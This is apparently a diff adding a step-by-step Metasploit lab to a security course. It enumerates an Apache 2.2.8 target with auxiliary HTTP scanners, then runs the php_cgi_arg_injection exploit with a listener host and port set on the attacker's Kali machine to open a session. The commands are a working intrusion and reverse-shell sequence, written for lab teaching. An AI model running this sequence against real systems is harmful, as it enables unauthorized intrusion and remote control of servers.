tekperfect/devops-docs/docs/courses/08-Security/lessons/metasploit-labs.md

 `set lhost xxx.xxx.xxx.xxx` (this should be your kali linux IP address)

 `set lport 4444` (Port on your system exploit and payload runs to create session)

+## Apache 2.2.8

+1. Start by searching for exploit based on port number and NMAP scan results of the NMAP -sV -O scan of your taget with the greatest number of open ports.

+Example: `grep exploit search apache`

+2. Since we have so many Apache exploits lets use an Auxlilary scanner to search for any potential exploits we can use.

+`use auxiliary/scanner/http/dir_listing`

+`set rhosts xxx.xxx.xxx.xxx`

+`show options`

+`run`

+3. Since that was successful lets use an Auxlilary directory scanner to search for any potential exploits we can use.

+`use auxiliary/scanner/http/dir_scanner`

+`show options`

+`run`

+`set rhosts xxx.xxx.xxx.xxx`

+`run`

+4. Since that was successful lets use an Auxlilary file scanner to search for any potential exploits we can use.

+`use auxiliary/scanner/http/files_dir`

+`show options`

+`run`

+`set rhosts xxx.xxx.xxx.xxx`

+`run`

+5. Since that was successful lets use the verbose authorization bypass to search for any potential exploits we can use.

+`use auxiliary/scanner/http/verb_auth_bypass`

+`show options`

+`set rhosts xxx.xxx.xxx.xxx`

+`run`

+6. Since that was unsuccessful lets use the php_cgi injection exploit to search for any potential exploits we can use.

+`use exploit/multi/http/php_cgi_arg_injection`

+`set rhosts xxx.xxx.xxx.xxx`

+`show options`

+`set lhost xxx.xxx.xxx.xxx`

+`set lport 4444`

+`run` or `exploit`